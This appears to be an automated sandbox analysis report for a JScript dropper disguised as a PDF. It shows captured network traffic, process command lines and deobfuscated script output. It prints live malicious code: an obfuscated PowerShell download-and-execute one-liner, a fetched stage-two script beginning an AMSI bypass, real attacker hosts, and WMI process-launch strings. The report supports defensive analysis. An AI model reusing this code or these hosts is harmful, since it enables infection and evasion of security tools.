                                                                        Nov 15, 2024 18:16:26.759223938 CET1236INData Raw: 29 2c 28 38 30 35 30 2d 28 32 30 34 31 30 39 34 30 2f 28 39 33 36 37 2d 28 31 39 33 31 30 32 37 37 2f 28 2d 36 38 36 30 2b 39 37 30 31 29 29 29 29 29 2c 28 37 36 35 31 30 30 2f 37 36 35 31 29 29 20 2d 6a 6f 69 6e 20 27 27 29 29 28 24 6f 6e 62 65
                                                                        Data Ascii: ),(8050-(20410940/(9367-(19310277/(-6860+9701))))),(765100/7651)) -join ''))($onbeariseresenonesonarerisat, -join (0..15 | ForEach-Object {[char]([int]('127160159129166147157154' + '148093132165146165154148').Substring($($_ * 3), 3) - 49)}) -j
                                                                        Nov 15, 2024 18:16:26.759284019 CET424INData Raw: 28 28 5b 63 68 61 72 5b 5d 5d 40 28 28 31 37 32 34 2d 28 33 35 39 35 2d 31 39 34 34 29 29 2c 28 38 30 36 31 39 30 2f 37 33 32 39 29 2c 28 31 30 32 38 37 2d 31 30 31 36 39 29 2c 28 2d 37 37 35 34 2b 37 38 36 35 29 2c 28 2d 31 32 37 36 2b 28 2d 31
                                                                        Data Ascii: (([char[]]@((1724-(3595-1944)),(806190/7329),(10287-10169),(-7754+7865),(-1276+(-1591+(1008186/(-957+(6913-5617))))),(7876-(-1496+(17240-7969)))) -join ''))($null, @($jwqlrby3ok1mtz6)) $ybco70l3zueikrd= $rslwodh3if5apu8.(([system.String]::n
                                                                        Nov 15, 2024 18:16:26.759746075 CET1236INData Raw: 30 32 30 2f 28 32 35 32 32 30 37 32 36 2f 28 2d 37 30 39 38 2b 31 30 31 31 37 29 29 29 29 29 29 29 29 29 28 22 61 38 72 6a 70 35 63 6c 7a 77 73 75 22 29 0d 0a 20 20 20 20 24 6b 6f 78 31 36 76 61 35 33 7a 74 67 73 71 39 20 3d 20 24 66 75 72 78 30
                                                                        Data Ascii: 020/(25220726/(-7098+10117)))))))))("a8rjp5clzwsu") $kox16va53ztgsq9 = $furx0m8aqyhcijw $t8jwcryain4vu1s = $(for ($kx87mvjn93rl6qz = 0; $kx87mvjn93rl6qz -lt $kox16va53ztgsq9.(([char[]]@((336-228),(2396-2295),(-9846+9956),(-4007+4110)
                                                                        Nov 15, 2024 18:16:26.759757996 CET1236INData Raw: 38 37 37 31 2d 38 36 38 38 29 2c 28 35 38 31 38 38 39 2f 34 38 30 39 29 2c 28 34 39 30 38 2d 28 2d 34 37 37 31 2b 39 35 36 34 29 29 2c 28 34 34 31 30 33 32 2f 33 38 30 32 29 2c 28 31 31 33 33 32 32 2f 28 38 36 39 34 2d 37 35 37 32 29 29 2c 28 2d
                                                                        Data Ascii: 8771-8688),(581889/4809),(4908-(-4771+9564)),(441032/3802),(113322/(8694-7572)),(-8835+(-299+9243)),(154652/3362),(7510-7437),(539254/6826),(1911-(15403035/(4688+3571))),(1346-1269),(-8884+(7085+(6014-(12566-8452)))),(-3316+(5456025/(3472-(-20
                                                                        Nov 15, 2024 18:16:26.759771109 CET1236INData Raw: 36 34 38 29 29 29 29 29 2c 28 35 38 35 38 30 2f 28 2d 34 33 36 37 2b 34 38 37 32 29 29 2c 28 38 39 35 35 36 37 2f 28 32 35 39 33 2b 36 32 37 34 29 29 2c 28 38 38 33 32 32 37 2f 28 33 32 34 31 32 30 30 30 2f 28 32 31 34 35 32 30 30 30 2f 35 33 36
                                                                        Data Ascii: 648))))),(58580/(-4367+4872)),(895567/(2593+6274)),(883227/(32412000/(21452000/5363))),(-9057+9103),(-8393+(5106+(14468160/4306))),(227204/(8694-(47207252/8114))),(468924/(16368-(62270964/(4156+5930)))),(6478-6411),(-6905+7016),(3763-(29739906
                                                                        Nov 15, 2024 18:16:26.764153004 CET1236INData Raw: 28 36 32 30 2b 34 38 36 35 29 29 2c 28 2d 37 38 32 37 2b 37 39 32 38 29 29 20 2d 6a 6f 69 6e 20 27 27 29 29 28 29 0d 0a 09 09 5b 62 79 74 65 5b 5d 5d 20 24 76 75 77 71 63 6a 34 66 30 35 6f 79 37 64 6d 20 3d 20 24 72 63 33 6b 70 73 79 35 69 71 6c
                                                                        Data Ascii: (620+4865)),(-7827+7928)) -join ''))()[byte[]] $vuwqcj4f05oy7dm = $rc3kpsy5iqlno6j.(([system.String]::new(@((653352/7778),(-8138+(28236327/3423)),(511680/7872),(899118/(899+(34807228/4981))),(986-872),(-9266+9363),(1073512/8872)))))() $e


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.649834206.188.196.37802356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 15, 2024 18:16:29.825778008 CET223OUTGET /q961kig3lwhtr.php?id=user-PC&key=111108474762&s=mints21 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: gidcldeaccadneh.top
                                                                        Connection: Keep-Alive
                                                                        Nov 15, 2024 18:16:31.016251087 CET1236INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Fri, 15 Nov 2024 17:16:30 GMT
                                                                        Content-Type: text/plain
                                                                        Content-Length: 1775
                                                                        Connection: keep-alive
                                                                        Data Raw: 0d 0a 24 51 3d 24 6e 75 6c 6c 3b 24 61 63 63 65 3d 22 24 28 28 27 53 79 73 74 27 2b 27 65 6d 27 29 2e 4e 6f 72 4d 61 4c 69 7a 45 28 5b 43 48 61 72 5d 28 5b 62 79 54 65 5d 30 78 34 36 29 2b 5b 63 68 41 72 5d 28 34 36 2b 36 35 29 2b 5b 43 48 61 72 5d 28 5b 42 59 74 65 5d 30 78 37 32 29 2b 5b 63 48 41 52 5d 28 5b 62 59 74 45 5d 30 78 36 64 29 2b 5b 43 48 61 52 5d 28 5b 62 79 74 45 5d 30 78 34 34 29 29 20 2d 72 65 70 6c 61 63 65 20 5b 43 48 41 72 5d 28 5b 42 79 54 45 5d 30 78 35 63 29 2b 5b 63 48 61 52 5d 28 5b 62 59 74 45 5d 30 78 37 30 29 2b 5b 43 68 41 52 5d 28 31 32 33 29 2b 5b 63 68 61 52 5d 28 37 37 29 2b 5b 63 48 41 52 5d 28 31 31 30 2b 31 39 2d 31 39 29 2b 5b 63 68 41 52 5d 28 5b 62 79 54 45 5d 30 78 37 64 29 29 2e 24 28 28 27 4d c3 a2 6e c3 a3 67 65 6d 65 27 2b 27 6e 74 27 29 2e 6e 6f 72 6d 41 4c 69 5a 45 28 5b 43 48 61 72 5d 28 5b 62 59 54 65 5d 30 78 34 36 29 2b 5b 43 48 41 72 5d 28 34 31 2b 37 30 29 2b 5b 43 48 61 52 5d 28 5b 62 79 74 45 5d 30 78 37 32 29 2b 5b 43 68 61 52 5d 28 5b 42 79 54 [TRUNCATED]
                                                                        Data Ascii: $Q=$null;$acce="$(('Syst'+'em').NorMaLizE([CHar]([byTe]0x46)+[chAr](46+65)+[CHar]([BYte]0x72)+[cHAR]([bYtE]0x6d)+[CHaR]([bytE]0x44)) -replace [CHAr]([ByTE]0x5c)+[cHaR]([bYtE]0x70)+[ChAR](123)+[chaR](77)+[cHAR](110+19-19)+[chAR]([byTE]0x7d)).$(('Mngeme'+'nt').normALiZE([CHar]([bYTe]0x46)+[CHAr](41+70)+[CHaR]([bytE]0x72)+[ChaR]([ByTE]0x6d)+[CHar](68+11-11)) -replace [CHaR]([bytE]0x5c)+[ChAR](112)+[Char](123+74-74)+[cHAr]([Byte]0x4d)+[CHAr](97+13)+[CHAR](125*89/89)).$((''+'u'+'t'+''+'m'+''+'t'+''+''+'n').NOrmAlIZE([cHaR](70)+[CHAR]([BYTe]0x6f)+[cHar](114+105-105)+[ChAr]([BYtE]0x6d)+[ChaR]([BYte]0x44)) -replace [CHAr](92)+[cHAr](112*93/93)+[CHAr](123)+[char](77)+[cHAr]([byte]0x6e)+[ChaR](125*47/47)).$(('msUt'+'ls').noRmAlize([char](70+6-6)+[CHAR]([bYte]0x6f)+[cHar](86+28)+[cHAR](109)+[cHar]([byTE]0x44)) -replace [CHaR]([bYtE]0x5c)+[chAr](112*84/84)+[ChaR](123*9/9)+[cHaR]([BytE]0x4d)+[CHAr](110+101-101)+[chaR](125*35/35))";$piooz="+('ydml'+'ftbg'+'mejg'+'nrrh'+'cpvs'+'vrx').NOrm [TRUNCATED]
                                                                        Nov 15, 2024 18:16:31.016268015 CET698INData Raw: 59 54 65 5d 30 78 36 64 29 2b 5b 63 48 61 52 5d 28 36 38 2a 34 31 2f 34 31 29 29 20 2d 72 65 70 6c 61 63 65 20 5b 43 68 61 72 5d 28 5b 62 79 54 45 5d 30 78 35 63 29 2b 5b 43 68 41 52 5d 28 5b 42 79 74 45 5d 30 78 37 30 29 2b 5b 63 68 41 72 5d 28
                                                                        Data Ascii: YTe]0x6d)+[cHaR](68*41/41)) -replace [Char]([byTE]0x5c)+[ChAR]([BytE]0x70)+[chAr](123)+[chaR](77*12/12)+[ChAR](110+73-73)+[ChAr]([BytE]0x7d)";[Threading.Thread]::Sleep(833);[Ref].Assembly.GetType($acce).GetField($(('ms'+'ntF'+'led'


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.64984751.91.79.174432356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-15 17:16:32 UTC295OUTPOST /aqdnA/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Host: temp.sh
                                                                        Content-Length: 0
                                                                        Connection: Keep-Alive
                                                                        2024-11-15 17:16:33 UTC173INHTTP/1.1 403 FORBIDDEN
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Fri, 15 Nov 2024 17:16:33 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 30
                                                                        Connection: close
                                                                        2024-11-15 17:16:33 UTC30INData Raw: 4d 61 78 69 6d 75 6d 20 64 6f 77 6e 6c 6f 61 64 20 6c 69 6d 69 74 20 72 65 61 63 68 65 64
                                                                        Data Ascii: Maximum download limit reached


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:12:15:58
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js"
                                                                        Imagebase:0x7ff77f850000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:12:16:21
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:12:16:21
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Call Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C4 clusterC8C6 clusterC10C6 clusterC12C6 clusterC14C6 clusterC16C6 clusterC18C6 clusterC20C6 clusterC22C4 clusterC24C22 clusterC26C22 clusterC28C22 clusterC30C2 clusterC32C0 clusterC34C32 clusterC36C32 clusterC38C32 clusterC40C32 clusterC42C0 clusterC44C42 clusterC46C44 clusterC48C46 clusterC50C46 clusterC52C46 clusterC54C46 clusterC56C46 clusterC58C46 clusterC60C46 clusterC62C44 clusterC64C62 clusterC66C62 clusterC68C62 clusterC70C42 clusterC72C0 clusterC74C72 clusterC76C0 clusterC78C0 clusterC80C0 clusterC82C80 clusterC84C0 clusterC86C0 clusterC88C0 clusterC90C0 E1C0 entry:C0 F3C2 whichburton0theirreign E1C0->F3C2 F33C32 XhisownprosperitythestudentshasASSEMBLIES E1C0->F33C32 F43C42 sdfsvs4h E1C0->F43C42 F77C76 whichburton0wallsand E1C0->F77C76 F79C78 whichburton0thispopular E1C0->F79C78 F85C84 GetObject E1C0->F85C84 F87C86 Create E1C0->F87C86 F89C88 Create E1C0->F89C88 F91C90 Create E1C0->F91C90 F3C2->F3C2 F81C80 whichburton0intohave F3C2->F81C80 F5C4 F31C30 'VltjYP' F5C4->F31C30 F7C6 F9C8 'charAt' F7C6->F9C8 F11C10 'fromCharCode' F7C6->F11C10 F13C12 'indexOf' F7C6->F13C12 F15C14 'slice' F7C6->F15C14 F17C16 'toString' F7C6->F17C16 F19C18 'charCodeAt' F7C6->F19C18 F21C20 decodeURIComponent F7C6->F21C20 F23C22 F25C24 thethrust F23C22->F25C24 F27C26 'charCodeAt' F23C22->F27C26 F29C28 'fromCharCode' F23C22->F29C28 F37C36 substr F33C32->F37C36 F39C38 parseInt F33C32->F39C38 F41C40 isNaN F33C32->F41C40 F35C34 Array() F43C42->F43C42 F73C72 afsga3rvz F43C42->F73C72 F45C44 F71C70 'kGcbgf' F45C44->F71C70 F47C46 F49C48 'charAt' F47C46->F49C48 F51C50 'fromCharCode' F47C46->F51C50 F53C52 'indexOf' F47C46->F53C52 F55C54 'slice' F47C46->F55C54 F57C56 'toString' F47C46->F57C56 F59C58 'charCodeAt' F47C46->F59C58 F61C60 decodeURIComponent F47C46->F61C60 F63C62 F65C64 afSga3rvz F63C62->F65C64 F67C66 'charCodeAt' F63C62->F67C66 F69C68 'fromCharCode' F63C62->F69C68 F73C72->F73C72 F75C74 F81C80->F81C80 F83C82

                                                                        Script:

                                                                        Code
                                                                        0
                                                                        var whichburton0wallsand = whichburton0theirreign;
                                                                          1
                                                                          var whichburton0thispopular = whichburton0theirreign;
                                                                            2
                                                                            function whichburton0theirreign(intohave, theirreign) {
                                                                            • whichburton0theirreign("0x1c6","8*oE") ➔ "winmgmts:root\cimv2:Win32_Process"
                                                                            • whichburton0theirreign("0x1c7","bA0z") ➔ "less powershel"
                                                                            • whichburton0theirreign("0x1c8","2wt&") ➔ "conhost --head"
                                                                            • whichburton0theirreign("0x1c9","huKX") ➔ "time"
                                                                            3
                                                                            var wallsand = whichburton0intohave ( );
                                                                            • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                            • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                            • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                            • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                            4
                                                                            whichburton0theirreign =
                                                                              5
                                                                              function (thispopular, theysought) {
                                                                              • whichburton0theirreign("0x1c6","8*oE") ➔ "winmgmts:root\cimv2:Win32_Process"
                                                                              • whichburton0theirreign("0x1c7","bA0z") ➔ "less powershel"
                                                                              • whichburton0theirreign("0x1c8","2wt&") ➔ "conhost --head"
                                                                              • whichburton0theirreign("0x1c9","huKX") ➔ "time"
                                                                              6
                                                                              thispopular = thispopular - ( - 0x1 * 0x1e4d + - 0x26e4 + - 0x25 * - 0x1eb );
                                                                                7
                                                                                var thethan = wallsand[thispopular];
                                                                                  8
                                                                                  if ( whichburton0theirreign['tHfiox'] === undefined )
                                                                                    9
                                                                                    {
                                                                                      10
                                                                                      var thethrust = function (Thispopular) {
                                                                                      • thethrust("WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG") ➔ "\xb0y\xb1Z\x084\xfcWW\xb9v\xd7\xf7\xfc]]\xaa\x12\xdf\x07\xd8\xa7^\xe09L\xf0\xf6i,\xc3\x11\xbe"
                                                                                      • thethrust("W5TzW5KSeSoNvaikW68wWRFdOCkJ") ➔ "\xdbY\xd9,\x12\xe7T\x02 \xef\x16\xb7\xe1\xa3"
                                                                                      • thethrust("WOOifMGIW6pcQSo0W5SFEmoqW7tdSq") ➔ "\x8a\x08\x16h"\xe3\xaa\xf4\xdb\x1fx\xd0\xf4\xf1"
                                                                                      • thethrust("W6tcUeLl") ➔ "\xe4\xb8IK"
                                                                                      11
                                                                                      var Theirreign = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                                        12
                                                                                        var Wallsand = '';
                                                                                          13
                                                                                          var Theysought = '';
                                                                                            14
                                                                                            for ( var Intohave = 0x880 + 0x419 * - 0x5 + 0xbfd, tHethrust, tHeysought, iNtohave = - 0x1c28 + - 0x2 * - 0x2e3 + 0x1662 ; tHeysought = Thispopular['charAt'] ( iNtohave ++ ) ; ~ tHeysought && ( tHethrust = Intohave % ( 0x144 + 0x34 * - 0x2f + 0x84c ) ? tHethrust * ( 0xc5 * 0x2b + 0x1f4e + 0x4025 * - 0x1 ) + tHeysought : tHeysought, Intohave ++ % ( 0x22bb + 0x846 + 0x9b * - 0x47 ) ) ? Wallsand += String['fromCharCode'] ( - 0x42 * 0xe + 0x3f8 + 0x1 * 0xa3 & tHethrust >> ( - ( 0x3 * 0xa7 + - 0x53 * - 0xb + - 0x584 ) * Intohave & - 0x97b * - 0x1 + - 0x4d9 + - 0x127 * 0x4 ) ) : - 0x1aed + - 0x6a * 0x2a + 0x2c51 )
                                                                                              15
                                                                                              {
                                                                                                16
                                                                                                tHeysought = Theirreign['indexOf'] ( tHeysought );
                                                                                                  17
                                                                                                  }
                                                                                                    18
                                                                                                    for ( var tYposyoke = 0x1 * - 0x18f2 + 0x1 * 0x2485 + - 0x1 * 0xb93, tHethan = Wallsand['length'] ; tYposyoke < tHethan ; tYposyoke ++ )
                                                                                                      19
                                                                                                      {
                                                                                                        20
                                                                                                        Theysought += '%' + ( '00' + Wallsand['charCodeAt'] ( tYposyoke ) ['toString'] ( - 0xb70 + 0x394 * 0x1 + 0x4 * 0x1fb ) )['slice'] ( - ( - 0x20 * 0x136 + - 0x831 + 0x2ef3 ) );
                                                                                                          21
                                                                                                          }
                                                                                                            22
                                                                                                            return decodeURIComponent ( Theysought );
                                                                                                            • decodeURIComponent("%c2%b0%79%c2%b1%5a%08%34%c3%bc%57%57%c2%b9%76%c3%97%c3%b7%c3%bc%5d%5d%c2%aa%12%c3%9f%07%c3%98%c2%a7%5e%c3%a0%39%4c%c3%b0%c3%b6%69%2c%c3%83%11%c2%be") ➔ "\xb0y\xb1Z\x084\xfcWW\xb9v\xd7\xf7\xfc]]\xaa\x12\xdf\x07\xd8\xa7^\xe09L\xf0\xf6i,\xc3\x11\xbe"
                                                                                                            • decodeURIComponent("%c3%9b%59%c3%99%2c%12%c3%a7%54%02%0a%c3%af%16%c2%b7%c3%a1%c2%a3") ➔ "\xdbY\xd9,\x12\xe7T\x02 \xef\x16\xb7\xe1\xa3"
                                                                                                            • decodeURIComponent("%c2%8a%08%16%68%22%c3%a3%c2%aa%c3%b4%c3%9b%1f%78%c3%90%c3%b4%c3%b1") ➔ "\x8a\x08\x16h"\xe3\xaa\xf4\xdb\x1fx\xd0\xf4\xf1"
                                                                                                            • decodeURIComponent("%c3%a4%c2%b8%49%4b") ➔ "\xe4\xb8IK"
                                                                                                            23
                                                                                                            };
                                                                                                              24
                                                                                                              var Thethrust = function (tHeirreign, wAllsand) {
                                                                                                              • function (thispopular, theysought).VltjYP("WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG","8*oE") ➔ "winmgmts:root\cimv2:Win32_Process"
                                                                                                              • function (thispopular, theysought).VltjYP("W5TzW5KSeSoNvaikW68wWRFdOCkJ","bA0z") ➔ "less powershel"
                                                                                                              • function (thispopular, theysought).VltjYP("WOOifMGIW6pcQSo0W5SFEmoqW7tdSq","2wt&") ➔ "conhost --head"
                                                                                                              • function (thispopular, theysought).VltjYP("W6tcUeLl","huKX") ➔ "time"
                                                                                                              25
                                                                                                              var tHispopular = [], THethan = - 0x1 * 0xc29 + - 0x2a * 0x65 + 0x1cbb, THeirreign, INtohave = '';
                                                                                                                26
                                                                                                                tHeirreign = thethrust ( tHeirreign );
                                                                                                                • thethrust("WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG") ➔ "\xb0y\xb1Z\x084\xfcWW\xb9v\xd7\xf7\xfc]]\xaa\x12\xdf\x07\xd8\xa7^\xe09L\xf0\xf6i,\xc3\x11\xbe"
                                                                                                                • thethrust("W5TzW5KSeSoNvaikW68wWRFdOCkJ") ➔ "\xdbY\xd9,\x12\xe7T\x02 \xef\x16\xb7\xe1\xa3"
                                                                                                                • thethrust("WOOifMGIW6pcQSo0W5SFEmoqW7tdSq") ➔ "\x8a\x08\x16h"\xe3\xaa\xf4\xdb\x1fx\xd0\xf4\xf1"
                                                                                                                • thethrust("W6tcUeLl") ➔ "\xe4\xb8IK"
                                                                                                                27
                                                                                                                var THethrust;
                                                                                                                  28
                                                                                                                  for ( THethrust = - 0x34 * - 0x34 + 0x18bc + - 0x234c ; THethrust < - 0x418 + 0xc57 + 0x73f * - 0x1 ; THethrust ++ )
                                                                                                                    29
                                                                                                                    {
                                                                                                                      30
                                                                                                                      tHispopular[THethrust] = THethrust;
                                                                                                                        31
                                                                                                                        }
                                                                                                                          32
                                                                                                                          for ( THethrust = 0x2330 + 0x5 * - 0x46d + - 0xd0f ; THethrust < 0x1fe6 + - 0x1964 + - 0x582 ; THethrust ++ )
                                                                                                                            33
                                                                                                                            {
                                                                                                                              34
                                                                                                                              THethan = ( THethan + tHispopular[THethrust] + wAllsand['charCodeAt'] ( THethrust % wAllsand['length'] ) ) % ( 0x19d + 0xff1 + - 0x108e );
                                                                                                                                35
                                                                                                                                THeirreign = tHispopular[THethrust];
                                                                                                                                  36
                                                                                                                                  tHispopular[THethrust] = tHispopular[THethan];
                                                                                                                                    37
                                                                                                                                    tHispopular[THethan] = THeirreign;
                                                                                                                                      38
                                                                                                                                      }
                                                                                                                                        39
                                                                                                                                        THethrust = 0x1f13 + - 0xdd + 0x2 * - 0xf1b;
                                                                                                                                          40
                                                                                                                                          THethan = - 0x1204 + - 0x1bda + 0x67 * 0x72;
                                                                                                                                            41
                                                                                                                                            for ( var THispopular = - 0x11 * 0x20f + 0x1937 + 0x1 * 0x9c8 ; THispopular < tHeirreign['length'] ; THispopular ++ )
                                                                                                                                              42
                                                                                                                                              {
                                                                                                                                                43
                                                                                                                                                THethrust = ( THethrust + ( 0x1147 * - 0x1 + 0x11 * 0x240 + - 0x14f8 ) ) % ( 0x1d5d + - 0x165f + - 0x5fe * 0x1 );
                                                                                                                                                  44
                                                                                                                                                  THethan = ( THethan + tHispopular[THethrust] ) % ( - 0x4 * 0x4fe + - 0x1b9c + 0xc25 * 0x4 );
                                                                                                                                                    45
                                                                                                                                                    THeirreign = tHispopular[THethrust];
                                                                                                                                                      46
                                                                                                                                                      tHispopular[THethrust] = tHispopular[THethan];
                                                                                                                                                        47
                                                                                                                                                        tHispopular[THethan] = THeirreign;
                                                                                                                                                          48
                                                                                                                                                          INtohave += String['fromCharCode'] ( tHeirreign['charCodeAt'] ( THispopular ) ^ tHispopular[( tHispopular[THethrust] + tHispopular[THethan] ) % ( - 0x1 * - 0x34d + 0x26b5 + - 0xb5 * 0x3a )] );
                                                                                                                                                            49
                                                                                                                                                            }
                                                                                                                                                              50
                                                                                                                                                              return INtohave;
                                                                                                                                                                51
                                                                                                                                                                };
                                                                                                                                                                  52
                                                                                                                                                                  whichburton0theirreign['VltjYP'] = Thethrust;
                                                                                                                                                                    53
                                                                                                                                                                    intohave = arguments;
                                                                                                                                                                      54
                                                                                                                                                                      whichburton0theirreign['tHfiox'] = ! ! [];
                                                                                                                                                                        55
                                                                                                                                                                        }
                                                                                                                                                                          56
                                                                                                                                                                          var typosyoke = wallsand[- 0x1 * 0x263 + 0x5 * - 0x67f + 0x22de];
                                                                                                                                                                            57
                                                                                                                                                                            var Thethan = thispopular + typosyoke;
                                                                                                                                                                              58
                                                                                                                                                                              var Typosyoke = intohave[Thethan];
                                                                                                                                                                                59
                                                                                                                                                                                if ( ! Typosyoke )
                                                                                                                                                                                  60
                                                                                                                                                                                  {
                                                                                                                                                                                    61
                                                                                                                                                                                    if ( whichburton0theirreign['AYGAss'] === undefined )
                                                                                                                                                                                      62
                                                                                                                                                                                      {
                                                                                                                                                                                        63
                                                                                                                                                                                        whichburton0theirreign['AYGAss'] = ! ! [];
                                                                                                                                                                                          64
                                                                                                                                                                                          }
                                                                                                                                                                                            65
                                                                                                                                                                                            thethan = whichburton0theirreign['VltjYP'] ( thethan, theysought );
                                                                                                                                                                                            • function (thispopular, theysought).VltjYP("WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG","8*oE") ➔ "winmgmts:root\cimv2:Win32_Process"
                                                                                                                                                                                            • function (thispopular, theysought).VltjYP("W5TzW5KSeSoNvaikW68wWRFdOCkJ","bA0z") ➔ "less powershel"
                                                                                                                                                                                            • function (thispopular, theysought).VltjYP("WOOifMGIW6pcQSo0W5SFEmoqW7tdSq","2wt&") ➔ "conhost --head"
                                                                                                                                                                                            • function (thispopular, theysought).VltjYP("W6tcUeLl","huKX") ➔ "time"
                                                                                                                                                                                            66
                                                                                                                                                                                            intohave[Thethan] = thethan;
                                                                                                                                                                                              67
                                                                                                                                                                                              }
                                                                                                                                                                                                68
                                                                                                                                                                                                else
                                                                                                                                                                                                  69
                                                                                                                                                                                                  {
                                                                                                                                                                                                    70
                                                                                                                                                                                                    thethan = Typosyoke;
                                                                                                                                                                                                      71
                                                                                                                                                                                                      }
                                                                                                                                                                                                        72
                                                                                                                                                                                                        return thethan;
                                                                                                                                                                                                          73
                                                                                                                                                                                                          };
                                                                                                                                                                                                            74
                                                                                                                                                                                                            return whichburton0theirreign ( intohave, theirreign );
                                                                                                                                                                                                            • whichburton0theirreign("0x1c6","8*oE") ➔ "winmgmts:root\cimv2:Win32_Process"
                                                                                                                                                                                                            • whichburton0theirreign("0x1c7","bA0z") ➔ "less powershel"
                                                                                                                                                                                                            • whichburton0theirreign("0x1c8","2wt&") ➔ "conhost --head"
